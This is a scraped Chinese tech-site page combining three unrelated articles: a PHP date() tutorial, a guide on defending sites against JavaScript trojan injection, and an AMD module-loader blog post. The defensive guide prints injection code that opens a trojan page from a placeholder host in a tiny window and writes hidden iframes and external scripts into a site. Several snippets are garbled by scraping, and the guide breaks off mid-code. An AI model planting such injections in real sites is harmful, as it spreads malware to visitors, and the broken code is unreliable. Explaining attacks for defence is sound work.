当前位置:  编程技术>WEB前端

[1]详解PHP的日期时间函数date()

PHP的日期时间函数date()

1，年-月-日
echo date('Y-m-j');
2007-02-6

echo date('y-n-j');
07-2-6

大写Y表示年四位数字，而小写y表示年的两位数字；
小写m表示月份的数字(带前导)，而小写n则表示不带前导的月份数字。

echo date('Y-M-j');
2007-Feb-6

echo date('Y-m-d');
2007-02-06

大写M表示月份的3个缩写字符，而小写m则表示月份的数字(带前导0);
没有大写的J，只有小写j表示月份的日期，无前导o；若需要月份带前导则使用小写d。

echo date('Y-M-j');
2007-Feb-6

echo date('Y-F-jS');
2007-February-6th

大写M表示月份的3个缩写字符，而大写F表示月份的英文全写。(没有小写f)
大写S表示日期的后缀，比如“st”、“nd”、“rd”和“th”，具体看日期数字为何。

小结：
表示年可以用大写的Y和小写y;
表示月可以用大写F、大写M、小写m和小写n(分别表示字符和数字的两种方式);
表示日可以用小写d和小写j，大写S表示日期的后缀。


2，时:分:秒

默认情况下，PHP解释显示的时间为“格林威治标准时间”，与我们本地的时间相差8个小时。

echo date('g:i:s a');
5:56:57 am

echo date('h:i:s A');
05:56:57 AM

小写g表示12小时制，无前导0，而小写h则表示有前导0的12小时制。
当使用12小时制时需要表明上下午，小写a表示小写的“am”和“pm”，大写A表示大写的“AM”和“PM”。

echo date('G:i:s');
14:02:26

大写G表示24小时制的小时数，但是不带前导的；使用大写的H表示带前导的24小时制小时数

小结：
字母g表示小时不带前导，字母h表示小时带前导；
小写g、h表示12小时制，大写G、H表示24小时制。

3，闰年、星期、天

echo date('L');
今年是否闰年：0

echo date('l');
今天是：Tuesday

echo date('D');
今天是：Tue

大写L表示判断今年是否闰年，布尔值，为真返回1，否则为0；
小写l表示当天是星期几的英文全写(Tuesday)；
而使用大写D表示星期几的3个字符缩写(Tue)。

echo date('w');
今天星期：2

echo date('W');
本周是全年中的第 06 周

小写w表示星期几，数字形式表示
大写W表示一年中的星期数

echo date('t');
本月是 28 天

echo date('z');
今天是今年的第 36 天

小写t表示当前月份又多少天
小写z表示今天是本年中第几天

4，其他

echo date('T');
UTC
大写T表示服务器的时间区域设置

echo date('I');
0
大写I表示判断当前是否为夏令时，为真返回1，否则为0

echo date('U');
1170769424
大写U表示从1970年1月1日到现在的总秒数，就是Unix时间纪元的UNIX时间戳。

echo date('c');
2007-02-06T14:24:43+00:00
小写c表示ISO8601日期，日期格式为YYYY-MM-DD，用字母T来间隔日期和时间，时间格式为HH:MM:SS，时区使用格林威治标准时间(GMT)的偏差来表示。

echo date('r');
Tue, 06 Feb 2007 14:25:52 +0000
小写r表示RFC822日期。

[2]怎样防止网站被JS挂马的代码和查杀方法

JS挂马方法有两种，一种是直接将JavaScript脚本代码写在网页中，当访问者在浏览网页时，恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口，隐藏地运行。

    这种方法使用的关键代码如下：
    window.open("http://www.123.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

    这种代码往往很长，很容易被安全工程师发现，而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0”，但是设置为0后，可能会出现恶意代码不运行的情况。

    另外一种JS挂马方式是，黑客先将挂马脚本代码“document.write('＜Iframe src=/blog_article/"网页木马地址"/index.html ></iframe＞')”，写入Windows中的写字板另存为后缀为.js的脚本文件，并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入：
    <script src=/blog_article/"http_/www.123.com/木马脚本.js"></script>_br/index.html Microsoft Yahei',Simsun; font-size:14px; line-height:21px">     或者
    document.write("<div >")
    document.write("<iframe src=/blog_article/"网页木马地址"/index.html width="0" height="0" scrolling="no" frameborder="0"></iframe>")
    document.write("</div>")
    就成功地将木马挂到了对方的网页中了。

    小提示：黑客还可以根据情况随机变换插入的JS挂马方法，例如黑客有可能会将脚本写为：
    <div word-wrap:break-word; color:rgb(68,68,68); font-family:Tahoma,'Microsoft Yahei',Simsun; font-size:14px; line-height:21px">     或者：
    <iframe src=/blog_article/"vbscript_[挂马脚本]">_br/index.html Microsoft Yahei',Simsun; font-size:14px; line-height:21px">     等等……
    防第一种JS挂马方式，不方便，用得非常少，而第二种JS挂马方式才是当前主流的，所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本，代码如下：
    iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}
    script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
    不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。

    所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码，这段代码会让异地外域的JS文件在使用document.write()时，被document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完，只有部分被强制输出了，Writer后面的内容再不会被写入访问者的电脑中，从而起到防范JS脚本挂马的作用。
    让JS木马的进程迅速中止
    在 <head> </head> 之间加入如下代码:
    屏蔽script和iframe
    <style type="text/css" id="LinrStudio">

[3]javascript【AMD模块加载器】浅析

很久没有写博客了，一来是工作比较忙，二来主要是觉得没什么可写。当然，自己的懒惰也是不可推卸的责任。
最近有点空余的时间，就看了一下AMD模块加载。关于它的定义和优缺点就不介绍了，园子里大把。相信大家也都知道。主要说一下加载器的原理以及在开发过程当中遇到的一些坑。当然由于加载器不是规范的一部分，所以实现方法也各不相同。我所用的方法也不是最优的，只是用来当作学习而已。

【模块加载器原理】
1.开始
2.通过模块名解析出模块信息，以及计算出URL。
3.通过创建SCRIPT的形式把模块加载到页面中。（当然也可以采用其它方法，如XHR。 IFRAME等等）
4.判断被加载的脚本，如果发现它有依赖就去加载依赖模块。如果不依赖其它模块，就直接执行factory方法。
5.等所有脚本都被加载完毕就执行加载完成之后的回调函数。
【实现的过程】
在弄懂了整个加载器的工作原理之后，就开始具体的编码过程。最开始，我使用了moduleCache，modules,moduleLoads这三个对象。分别记录加载中需要用到的信息。首先我把整个加载的信息存储到moduleCache中。其中的结构大致如下。

在modules中储存具体的模块信息，也就是moduleCache[uuid]的deps中的模块的具体信息。结构很简单，主要是记录一下名字，和url和状态。

moduleLoads 中是存储的加载信息，也就是uuid的数组。 过程很顺利，很快就完成了开发。当然有一个前提，加载的模块是不能依赖其它模块的。 实现的大致原理就是。分析完毕模块信息，储存完上面的信息后。创建一个script来加载模块。当被加载的模块的define执行的时候，就通过模块名去modules中把模块的状态改为1,然后执行模块的factory方法。得到exports 放入到modules[modname].exports 中。 然后循环moduleLoads，得到uuid去moduleCache中的数据。然后判断deps的模块是否全部加载完毕。如果加载完毕就执行callback方法。 然后把uuid从moduleLoads中删除。

然后开始实现加载的模块依赖别的模块，一开始的做法是当发现加载的模块存在依赖的时候，就从新调用require方法去加载模块需要的模块。 然而这样就造成了一个问题。就是等所有的被依赖的模块加载完毕之后，按照上面的流程执行完毕。无法告知需要依赖的那个模块它依赖的模块都被加载完毕了。可能这么说不是太直观，看一下现在变量里存储的信息就一目了然了。

就像上面这样，test已经加载完毕。uuid 为cb10002的moduleCache的信息已经执行完毕。但是无法让hello模块加载完毕。 苦思冥想了许久，终于找到了一个解决方案。就是在申请一个变量，来存储模块的依赖信息。 结构如下

这样一来就解决了两个问题，一个是循环依赖的问题，可以通过上面的结构被检测出来。二来就是可以在被依赖模块被加载完毕之后遍历上面的moduledeps来将需要依赖的那个模块状态改为加载完成。从而执行moduleCache中的回调。又经过一番编码之后，初级版本的模块加载器终于完成了。 实现了并行下载依赖模块，可以检测循环依赖。在各个浏览器下测试。似乎都没什么问题。然后当我去测试加载在不同目录的两个同名模块的时候，问题产生了。后加载的模块，覆盖了前面的同名模块的信息。 后来在群里经过一番讨论，决定用URL来做modules的key。这样就避免了覆盖的问题。 同时又优化了加载器的结构，将3个变量改为两个变量。 保留了modules与moduleCache，去掉了moduleLoads与moduledeps。

结构如下。

这样通过url既可以获得模块的依赖，又能够获得模块。 所以就不用modoleLoads与moduleDeps了。然后在define中获得url又有一个坑就是在safari下无法获得正在被解析的script。获得正在被解析的script请参见正美大大的这篇文章。 不过在safari下又另外一个特性就是在脚本解析完成之后会立即调用脚本的onload事件，如此一来就找到了解决办法。 就是在脚本解析的时候，存入一个函数到某个数组中，然后在它的onload事件中取出这个函数。将node的url传入函数中就可以了，唯一的坏处就是比可以获得url要慢上一点点。想到办法之后便开始改代码，经过半天左右的编码终于完成了。 下面是全部源码。在各个浏览器中测试都通过。但由于个人能力有限，其中未被发现的bug定所难免，如果各位发现其中的bug或有什么不足的地方请告知。